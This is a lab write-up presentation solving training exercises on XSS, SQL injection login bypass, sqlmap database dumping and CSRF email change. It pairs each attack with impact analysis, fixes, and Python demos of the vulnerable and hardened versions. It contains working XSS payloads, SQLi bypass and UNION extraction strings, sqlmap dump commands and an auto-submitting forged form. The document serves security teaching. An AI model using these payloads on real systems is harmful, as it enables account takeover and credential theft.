Ethical Hacking Techniques for Web Application Security

jadavvineet73 222 views 22 slides Jul 06, 2024

About This Presentation

Explore common web application vulnerabilities like CSRF and XSS, and learn how ethical hackers use these techniques to identify and fix security weaknesses responsibly. This presentation will also cover best practices for securing web applications and preventing attacks. for more info visit: https:...


Slide Content

Solving labs created for the following vulnerabilities: Login Bypass (SQLi), Admin Credentials Access (SQLi), CSRF, XSS

Abstract: The objective of this report is to solve labs designed to demonstrate vulnerabilities in web applications. The labs cover the following vulnerabilities:
- Login Bypass (SQLi)
- Admin Credentials Access (SQLi)
- Cross-Site Request Forgery (CSRF)
- Cross-Site Scripting (XSS)
Using VMware as the penetration-testing environment, each vulnerability is investigated and demonstrated, assessed for its impact, and paired with recommendations for mitigating it. The report also looks at mechanisms and strategies for protecting the whole web application against these classes of flaw, so that web application developers, providers and users better understand common security issues and the practices for addressing them.

Research: Hack The Box (HTB) is a popular platform for penetration testing and ethical hacking practice.
- Name: Hack The Box
- URL: https://academy.hackthebox.com
- Category/Type: Penetration Testing Labs, CTF (Capture The Flag) Challenges
- Ranking/Usage/Popularity: Hack The Box is widely used by cybersecurity enthusiasts, penetration testers and ethical hackers. It offers machines of varying difficulty, from beginner to advanced, that simulate real-world scenarios, so users can practise web application security, network penetration testing, cryptography and more. It also hosts regular competitions and events, which add to its popularity within the community.

About XSS: Cross-Site Scripting (XSS) is a common vulnerability in web applications. It occurs when an attacker injects a script into a web page viewed by other users; the script runs in the victim's browser with the privileges of the page, which can lead to various malicious activities. The two types of XSS covered here:
- Reflected XSS: the injected script is sent to the server (typically in a URL or form parameter) and immediately reflected, or echoed, back to the browser in the server's response, so it runs for whoever submits the crafted request.
- Stored XSS: the injected script (typically JavaScript) is stored on the server side, for example in a database, and is served to every user who later requests the compromised content.

Solving Labs: Question: What is the value of the 'flag' cookie? Lab Exploration: In our lab setup, shown in Image 1, there is a single input field. Testing for XSS: To determine whether the input is reflected into the page without encoding, we submitted a simple probe: <script>alert("Never Give up")</script> Payload explanation: the JavaScript alert() function displays a dialog box with the given message, here "Never Give up". After submitting this payload, the popup shown in Image 2 confirms that the script executed, i.e. the site is vulnerable to XSS. Next step: extract the site's cookie with an XSS payload. Image 1 Image 2

Continuation: We then used the following payload to read and display all cookies that script can see for the current domain: <script>alert(document.cookie)</script> Executing it displayed the flag cookie, as shown in Image 3. Note that document.cookie only exposes cookies that are not marked HttpOnly; the payload works here because the lab's flag cookie lacks that attribute. Image 3

Impact Analysis for XSS Vulnerabilities:
- Data Theft. Impact: attackers can steal sensitive information such as credentials or personal data. Example: exploiting an XSS flaw on a social media site, an attacker injects a script into comments that sends users' session cookies to a server they control, allowing them to log in as the victims without their passwords.
- Session Hijacking. Impact: attackers can take over legitimate user sessions. Example: an XSS flaw in an online banking site lets an attacker run a script that captures the user's session cookie, giving unauthorized access to the victim's account.
- Client-Side Defacement. Impact: attackers can alter a site's appearance, damaging trust. Example: using XSS on an e-commerce site, an attacker posts a review containing a script that rewrites the page to show offensive content, harming the site's reputation.
- Malware Distribution. Impact: XSS can be used to push malware to users' devices. Example: an attacker exploits an XSS weakness in a news site's comment section to inject a script that redirects visitors to a download of malicious software.

Recommendations:
- Implement robust input validation and output encoding. Action: validate inputs against what each field is supposed to contain, and encode user-supplied data for the context it is rendered into (HTML body, attribute, JavaScript, URL) at the point of output. Example: on a forum site, a comment containing HTML tags or script is stored as-is but rendered with <, >, " and & encoded, so the browser displays it as text rather than executing it. Stripping tags on input alone is not a reliable defence; encoding on output is the primary control.
- Use Content Security Policy (CSP) headers. Action: set CSP directives that specify which origins may load scripts and other resources. Example: a site sets a CSP header that only allows scripts from its own origin ('self') and trusted sources (trusted.com). Injected inline scripts come from neither, so the browser refuses to run them (as long as the policy does not allow 'unsafe-inline').
- Regularly update and patch the web application. Action: follow security advisories for frameworks and libraries such as React or Angular and apply patches promptly. Example: after an XSS vulnerability is found in a widely used JavaScript library, its developers release a fixed version; sites that upgrade are no longer exposed to attackers targeting that flaw.
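As an added illustration of the lab above and of the first two recommendations (this is example code written for this page, not the lab's server or any HTB code), the following Python shows the lab's probe reflected by an unencoded template versus an output-encoded one, together with the CSP and cookie headers that would have blocked the two payloads. The page template, the use of html.escape as the encoder, the cookie name 'flag' and the allowed script origin https://trusted.com are assumptions for the demo; html.escape is correct for an HTML text or attribute context only, and a value written into a script block or a URL needs a different encoder.

```python
"""Added example (not the lab's or HTB's code): the reflected XSS probe from the
lab against an unencoded template and an output-encoded one, plus the response
headers the recommendations call for.

Assumptions: the template, html.escape as the encoder, the cookie name 'flag'
and the CSP source https://trusted.com are constructed for this demo.
"""
import html

# The two payloads used in the lab, verbatim.
PROBE = '<script>alert("Never Give up")</script>'
COOKIE_PROBE = "<script>alert(document.cookie)</script>"


def render_vulnerable(user_input):
    """Reflects the input into the page untouched: the lab's behaviour."""
    return "<p>You searched for: %s</p>" % user_input


def render_safe(user_input):
    """Output-encodes for an HTML text context, so '<' becomes '&lt;' and the
    browser shows the payload as text instead of parsing it as a tag."""
    return "<p>You searched for: %s</p>" % html.escape(user_input, quote=True)


def reflected_unencoded(page, probe):
    """The lab's test in code form: is the probe echoed back verbatim?"""
    return probe in page


def csp_header(script_sources=("https://trusted.com",)):
    """Scripts may load only from the site itself and the listed origins.
    An injected inline <script> matches neither, so the browser refuses it."""
    allowed = " ".join(("'self'",) + tuple(script_sources))
    return (
        "Content-Security-Policy: default-src 'self'; script-src %s; object-src 'none'"
        % allowed
    )


def session_cookie_header(name, value):
    """HttpOnly keeps document.cookie from reading the value, which is exactly
    what the lab's second payload relied on; Secure and SameSite are the usual
    companions (the cookie value here is a placeholder)."""
    return "Set-Cookie: %s=%s; HttpOnly; Secure; SameSite=Lax" % (name, value)


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("safe", render_safe)):
        page = render(PROBE)
        print(label, "reflects probe unencoded:", reflected_unencoded(page, PROBE))
        print("   ", page)
    print(render_safe(COOKIE_PROBE))
    print(csp_header())
    print(session_cookie_header("flag", "placeholder-value"))
```

Run it directly to see both renderings side by side; the encoded version is what the lab's page should have returned for the probe.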

Login Bypass using SQL Injection: SQL Injection is an attack in which user input is inserted, or "injected", into an SQL query as SQL syntax rather than data, allowing an attacker to view, modify or delete database contents without authorization. In this exercise we attempt to bypass the login page without knowing a password. First we tried the default credentials admin / admin, without success. Next we tried a basic SQLi payload in the username field: admin' or '1'='1'-- - This payload did not work either, so we ran a list of authentication bypass payloads through the login form, taken from the following GitHub repository: PayloadsAllTheThings - SQL Injection - Authentication Bypass Image 4 Image 5

Continuation: We used Burp Suite Intruder to run the payload list against the login request. In the intercepted request, shown in the attached image, the username field is marked as the payload position; payload URL-encoding must be disabled in Intruder's payload settings so that characters such as ' and # reach the server unchanged. As the image shows, shorter payloads succeed in bypassing the login. A straightforward one is: admin' or 1=1# Here 1=1 always evaluates to true, so the WHERE clause matches every row, and # (the MySQL comment character) comments out the rest of the statement, so the password condition is never evaluated; the application logs us in as the first user returned. Using this payload we bypassed the login and reached the application dashboard. Image 6 Image 7 Image 8

Impact Analysis of SQL Injection for Login Bypass:
1. Unauthorized Access. Impact: attackers can reach restricted areas of the application. Example: bypassing authentication to log in as an administrator.
2. Privilege Escalation. Impact: attackers can elevate their privileges within the application. Example: using functions or data reserved for privileged users.
3. Data Exposure. Impact: attackers can retrieve sensitive user information. Example: extracting user credentials or personal details from the database.

Recommendations:
- Use Parameterised Queries. Action: pass user input to the database as bound parameters (prepared statements) instead of concatenating it into the SQL text, so quote and comment characters are treated as data. Example: the login query takes the username and password as parameters; the payload admin' or 1=1# is then compared literally against the username column and matches nothing. This is the primary defence; the measures below are complementary.
- Validate and Sanitize Inputs. Action: check that user input has the expected form before using it. Example: enforce strict username and password formats.
- Implement Strong Authentication. Action: use multi-factor authentication (MFA). Example: require a second factor such as a one-time password, so a bypassed password check alone does not grant access.
- Regular Security Updates. Action: keep software and libraries updated. Example: schedule routine security patches and updates.
- Educate Developers. Action: train developers in secure coding practices. Example: raise awareness of SQL injection risks and how to avoid them.

Admin Credential Access using SQLi: Question: Using SQL injection, retrieve the password for the username 'Adam' stored in the SQL database. We used sqlmap, an automated SQL injection tool, to extract data from the database. The command: sqlmap -u "http://94.237.60.99:38071/" --data="username=admin&password=admin123" --dbs --batch --dbms=mysql Explanation:
- sqlmap: tool for automated SQL injection detection and database takeover.
- -u: the URL of the target.
- --data: the POST body of the request; sqlmap tests each parameter in it (username and password) for injection.
- --dbs: enumerate database names.
- --batch: run non-interactively, accepting the default answer to every prompt.
- --dbms=mysql: tell sqlmap the backend is MySQL, so it skips detection for other database engines.
Image 9 (Dashboard)

Continuation: Results: sqlmap confirmed the injection point and enumerated the databases, as shown in the provided image; the database of interest is ilfreight. To list its tables we ran: sqlmap -u "http://94.237.60.99:38071/" --data="username=admin&password=admin123" -D ilfreight --tables --batch --dbms=mysql Command breakdown:
- -D ilfreight: restrict enumeration to the ilfreight database.
- --tables: enumerate all tables within that database.
Outcome: two tables were found in ilfreight, and we proceeded to the 'users' table. Extracting data from the 'users' table: to dump it we ran the following command. Image 10 Image 11

Continuation: sqlmap -u "http://94.237.60.99:38071/" --data="username=admin&password=admin123" -D ilfreight -T users --dump --batch --dbms=mysql Command breakdown:
- -T users: target the 'users' table within the ilfreight database.
- --dump: retrieve and display all rows of the specified table.
The command retrieved the contents of the 'users' table, including the password for the user Adam. Image 12
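The two SQL injection sections above (the login bypass with its Intruder payload sweep, and the credential extraction that sqlmap automated) share one underlying flaw, so here is one added example, written for this page and not taken from the lab or from HTB, that reproduces both against an in-memory SQLite database and then shows the parameterised fix from the recommendations. SQLite stands in for the lab's MySQL backend, which is why the statements are closed with the standard '-- ' comment instead of MySQL's '#'; the users table, its columns, the two sample rows and the short payload list are constructed for the demo (passwords are in clear text only because that is what the lab's dump returned).

```python
"""Added example (not the lab's or HTB's code): SQL injection login bypass,
an Intruder-style payload sweep, the data extraction that sqlmap automates,
and the parameterised fix, all against an in-memory SQLite database.

Assumptions: SQLite stands in for the lab's MySQL backend, so payloads end
with the '-- ' comment rather than MySQL's '#'; the users table, its columns,
the sample rows and the payload list are constructed for this demo.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret-admin-pw"), ("Adam", "adam-pass-1234")],  # constructed rows
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The flaw: input is concatenated into the statement, as the lab's form does."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """The fix: bound parameters, so quote and comment characters stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def attempt(conn, username, password="anything"):
    """Run one payload and report ('ok', result) or ('error', message).

    A payload that is valid on one DBMS is often a syntax error on another:
    the page's MySQL payload admin' or 1=1# fails here because SQLite has
    no '#' comment, which is why sqlmap's --dbms option matters.
    """
    try:
        return ("ok", login_vulnerable(conn, username, password))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# A short constructed sweep in the spirit of the PayloadsAllTheThings list the
# page feeds to Burp Intruder. Order matters: the first hit ends the sweep.
BYPASS_PAYLOADS = [
    "admin",                  # plain default credential, expected to fail
    "admin' or 1=1#",         # MySQL form from the page; errors on SQLite
    "admin' OR '1'='1'-- -",  # page's first payload with a portable comment
    "' OR 1=1-- -",           # shortest form; matches the first row
]


def sweep(conn, payloads=BYPASS_PAYLOADS):
    """Return the first payload that logs someone in, and who it logged in as."""
    for payload in payloads:
        status, result = attempt(conn, payload)
        if status == "ok" and result is not None:
            return payload, result
    return None, None


def extract_password(conn, target_user):
    """What sqlmap's --dump did in one hand-written step: a UNION through the
    same injection point that swaps the selected column for the target's
    password."""
    payload = "' UNION SELECT password FROM users WHERE username = '%s'-- -" % target_user
    return login_vulnerable(conn, payload, "x")


if __name__ == "__main__":
    db = make_db()
    print("first working bypass:", sweep(db))
    print("Adam's password via UNION:", extract_password(db, "Adam"))
    print("same payload, parameterised:", login_safe(db, "' OR 1=1-- -", "x"))
```

The sweep shows why the page had to disable payload encoding and try several forms: the first candidate is simply a wrong password, the second is a syntax error on this engine, and only the third matches a row. The UNION step is the manual equivalent of the -D/-T/--dump chain; sqlmap's value is in finding the injection point and the table and column names automatically.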

CSRF (Cross-Site Request Forgery): CSRF is a web security vulnerability that tricks a user into executing unwanted actions on a web application where they are authenticated. It works because the browser automatically attaches the site's session cookie to any request sent to that site, whether or not the user intended to send it. Question: To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server. We will change the user's account email from "[email protected]" to [email protected]. Open Burp's browser and log in to our account. Submit the "Update email" form and find the resulting request in the Proxy history. The request goes to "/my-account/change-email". Using this, we create a form that submits a request to change the user's email. Image 13 Image 14

Continuation: <form method="POST" action="https://0aa900d8042951e28278b0d2004900a2.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value=” [email protected] "> </form> <script> document.forms [0].submit(); </script> Method: The form uses the POST method to submit data to the server. Action: The action attribute specifies the URL to which the form data will be sent. In this case, it's the endpoint for changing the user's email. Hidden Input: The input element of type "hidden" includes the new email address, [email protected] , which the attacker wants to set. Script Tag: This script automatically submits the form when the page loads. document.forms [0].submit(): This JavaScript code selects the first form on the page (in this case, the only form) and submits it immediately. User Interaction: Trick the user into clicking the link. Once the user clicks on this malicious link and the page loads, the email ID will be changed to [email protected] without the user's knowledge. Image 15

Impact analysis of CSRF:
- Unauthorized Actions: attackers can perform actions on behalf of the user without their knowledge. Example: a forged request changes the victim's email or password on a social media account, locking them out.
- Data Integrity: sensitive data can be altered or deleted through forged requests. Example: a forged request to a school portal modifies or removes records the logged-in user is allowed to edit.
- Loss of User Trust: users lose confidence in an application once they learn their accounts can be manipulated without their consent. Example: customers of an online store whose account details were changed by a CSRF attack become wary of using it again.
- Financial Loss: for applications that handle transactions, CSRF can cause direct financial loss. Example: a forged request to a banking site's transfer endpoint moves money out of the victim's account.
- Escalation of Privileges: if the victim holds administrative rights, the impact is correspondingly larger. Example: a forged request made by a logged-in forum administrator deletes user posts or creates a new admin account.

Recommendations:
- Utilize Tokens. Action: include anti-CSRF tokens in forms and state-changing requests and verify them server-side, so a request is only honoured if it originated from the application's own page. Example: a banking application embeds a unique, session-bound token in each form; when a user submits a funds transfer, the server checks that the token matches before processing, and a forged request from another site, which cannot know the token, is rejected.
- Implement SameSite cookies. Action: set the SameSite attribute on session cookies to "Strict" or "Lax" so the browser withholds them from cross-site requests. Example: a social media platform marks its session cookie SameSite=Lax, so a cross-site POST such as the form above is sent without the cookie and the server sees an unauthenticated request.
- Educate users. Action: provide security awareness training so users recognise phishing attempts and malicious sites. Example: an email service advises users not to follow links from unknown senders and to verify the authenticity of requests before entering sensitive information.
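To make the CSRF lab and the first two recommendations concrete, here is an added example written for this page (not the lab's server code or anything from PortSwigger): a change-email handler in the lab's vulnerable form beside a hardened one that checks a session-bound synchronizer token and the Origin header, exercised with the request the auto-submitting form above would produce, plus the browser's SameSite rule that decides whether the session cookie goes along with such a request. The in-memory session store, the cookie name 'session', the user 'victim', the addresses victim@example.com and attacker@example.com, and the exploit-server origin are assumptions for the demo; the endpoint path and the 'email' field name are the lab's.

```python
"""Added example (not the lab's or PortSwigger's code): a change-email handler
with and without CSRF protection, exercised with the forged request that the
auto-submitting form on the page produces, plus the SameSite cookie rule.

Assumptions: the in-memory store, cookie name 'session', user 'victim', the
example.com addresses and the exploit-server origin are constructed here;
the path /my-account/change-email and the 'email' field are the lab's.
"""
import hmac
import secrets

SITE_ORIGIN = "https://0aa900d8042951e28278b0d2004900a2.web-security-academy.net"


def make_store():
    """Constructed state: one logged-in user whose session holds a CSRF token."""
    return {
        "users": {"victim": "victim@example.com"},
        "sessions": {
            "sess-victim": {"user": "victim", "csrf": secrets.token_urlsafe(32)}
        },
    }


def forged_request(session_cookie):
    """What the browser sends when the exploit page auto-submits: the victim's
    cookie goes along automatically, the form carries only the attacker's
    email, and Origin points at the exploit server."""
    return {
        "path": "/my-account/change-email",
        "cookies": {"session": session_cookie},
        "form": {"email": "attacker@example.com"},
        "headers": {"Origin": "https://exploit-server.example"},
    }


def legitimate_request(store, session_cookie, new_email):
    """The real form: same cookie, plus the hidden anti-CSRF token that the
    site rendered into the page for this session, and a same-site Origin."""
    return {
        "path": "/my-account/change-email",
        "cookies": {"session": session_cookie},
        "form": {"email": new_email, "csrf": store["sessions"][session_cookie]["csrf"]},
        "headers": {"Origin": SITE_ORIGIN},
    }


def change_email_vulnerable(store, request):
    """The lab's behaviour: a valid session cookie is the only check."""
    session = store["sessions"].get(request["cookies"].get("session"))
    if session is None:
        return 401
    store["users"][session["user"]] = request["form"]["email"]
    return 200


def change_email_safe(store, request):
    """Synchronizer token bound to the session, compared in constant time,
    with an Origin check as defence in depth. Order matters: authenticate
    first, then reject anything that cannot prove it came from our page."""
    session = store["sessions"].get(request["cookies"].get("session"))
    if session is None:
        return 401
    token = request["form"].get("csrf", "")
    if not hmac.compare_digest(token, session["csrf"]):
        return 403
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    store["users"][session["user"]] = request["form"]["email"]
    return 200


def cookie_sent(samesite, cross_site, method):
    """Browser rule for the SameSite attribute: Strict never accompanies a
    cross-site request, Lax only top-level navigations with a safe method
    such as GET, and None (or an unset attribute on older browsers) always."""
    if not cross_site:
        return True
    if samesite == "Strict":
        return False
    if samesite == "Lax":
        return method == "GET"
    return True


if __name__ == "__main__":
    store = make_store()
    print("vulnerable handler:", change_email_vulnerable(store, forged_request("sess-victim")),
          store["users"]["victim"])
    store = make_store()
    print("hardened handler, forged:", change_email_safe(store, forged_request("sess-victim")),
          store["users"]["victim"])
    print("hardened handler, legitimate:",
          change_email_safe(store, legitimate_request(store, "sess-victim", "new@example.com")),
          store["users"]["victim"])
    print("Lax cookie sent with cross-site POST:", cookie_sent("Lax", True, "POST"))
```

The forged request fails the hardened handler twice over: it carries no token, and its Origin is the exploit server. With a SameSite=Lax session cookie the cross-site POST would not even arrive authenticated, which is why the two measures complement each other rather than replace one another.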

References
- https://owasp.org/www-community/attacks/xss/
- https://portswigger.net/web-security/cross-site-scripting
- https://portswigger.net/web-security/sql-injection
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/csrf
- https://medium.com/@ry4nnnn/portswigger-labs-csrf-10b496d6580c
- https://github.com/sqlmapproject/sqlmap
- https://www.geeksforgeeks.org/use-sqlmap-test-website-sql-injection-vulnerability/
- https://academy.hackthebox.com

Questions ?

Thank You!